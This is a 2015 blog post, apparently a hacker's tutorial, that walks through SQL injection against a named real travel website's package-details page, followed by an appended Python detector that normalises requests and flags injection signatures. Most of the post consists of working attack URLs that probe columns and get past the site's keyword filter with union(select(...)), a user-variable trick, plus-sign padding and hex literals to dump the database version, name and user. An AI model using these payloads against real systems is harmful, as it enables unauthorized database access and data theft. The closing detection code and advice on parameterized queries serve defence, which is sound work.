Tuesday, September 29, 2015

SQLi Challenge Solution 1

First, hello to all :) from D4RK 4NG31

Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, let's start.

Finding which comment is working:

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 --   ====> no error, which means the comment (--) is working.

-- and # behave the same in most cases.

So, we don't have to use any comment :))

Now it's time to find the columns.

First we'll use order by:

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by is blocked, so we'll use group by instead:

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> shows an error, which means it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So, the vulnerable column is 1.

Now it's time to use union select:

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

It seems the site blocks the special chars * and !.

Now it's time to obfuscate the query.

For this we'll use the union(select form.

With this form, the columns are written like this: union(select (1),(2),(3),(4),(5))

Let's try:

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS.

As I already told you, the concat function is used to print the output of multiple queries at once:

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error... it seems the site is blocking the comma (,).

To bypass it we'll use the variable method:

and@x:=

Let's try this:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat(version(),database(),user()) union(select (@x))

Again an error.

Let's test the WAF. First we'll see which word the site is blocking:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

concat( is blocked.

To get past it we'll pad concat with a large number of + characters.

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++(0x3c703e496e6a6563746564206279204434524b20344e4733313c2f703e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#

Done :) Happy Injecting ;) Tutorial by D4RK 4NG31
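The bypasses in this write-up all exploit the gap between a filter that matches literal tokens (order by, union select, concat(, *, !, the comma) and MySQL, which accepts version comments, union(select(...)), user variables and whitespace padding. Below is an added example (my code, not the author's) of detection logic that normalises a request target the way the parser would before matching signatures; the sample targets are constructed, modelled on the probes above.

```python
import re
from urllib.parse import unquote_plus

# Signatures are matched against the NORMALIZED request target, i.e. after
# undoing the same transformations MySQL itself tolerates. That is what the
# keyword blacklist in the write-up failed to do.
SIGNATURES = {
    "column_probe":       re.compile(r"\b(order|group) by \d+"),      # order by 122 / group by 1
    "union_select":       re.compile(r"\bunion\s*\(?\s*select\b"),    # union select, union(select(
    "user_variable":      re.compile(r"@\w+\s*:="),                   # and@x:=
    "sql_function":       re.compile(r"\b(concat|version|database|user)\s*\("),
    "hex_literal":        re.compile(r"\b0x[0-9a-f]{8,}"),            # 0x3c62723e ...
    "comment_terminator": re.compile(r"(--|#)\s*$"),                  # trailing -- or #
}

def normalize(target: str) -> str:
    """Canonicalise a raw request target (path?query) before matching.

    unquote_plus turns %XX escapes and '+' into their characters, so the
    'concat++++(' padding collapses to 'concat (' and '/*!50000union*/'
    is reduced to the keyword the server would actually execute.
    """
    s = unquote_plus(target).lower()
    s = re.sub(r"/\*!\d*(.*?)\*/", r"\1", s)   # MySQL version comment -> its body
    s = re.sub(r"/\*.*?\*/", " ", s)            # ordinary comments -> whitespace
    return re.sub(r"\s+", " ", s)

def classify(target: str) -> list[str]:
    """Return the names of every signature that fires on one request target."""
    norm = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

# Constructed sample access-log targets modelled on the probes in the write-up.
SAMPLE_TARGETS = [
    "/pckge-details.php?id=2",                                    # benign
    "/search.php?q=group+by+laws+order+form",                     # benign words, no digits
    "/pckge-details.php?id=2%20group%20by%201",
    "/pckge-details.php?id=2%20/*!50000union*/%20/*!50000select*/%201",
    "/pckge-details.php?id=2%20and@x:=concat+++++(0x3c62723e,version(),user())+UNION(SELECT(@x))#",
]

def scan(targets=SAMPLE_TARGETS) -> dict[str, list[str]]:
    """Map every target to the signatures it triggers; an empty list means clean."""
    return {t: classify(t) for t in targets}

if __name__ == "__main__":
    for target, hits in scan().items():
        print(f"{'ALERT' if hits else 'ok   '} {target}  {hits}")
```

Normalising before matching is exactly what the blocked filter above did not do. The durable fix for pckge-details.php is a parameterized query with id bound as an integer, since no token filter can anticipate every equivalent spelling MySQL accepts.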
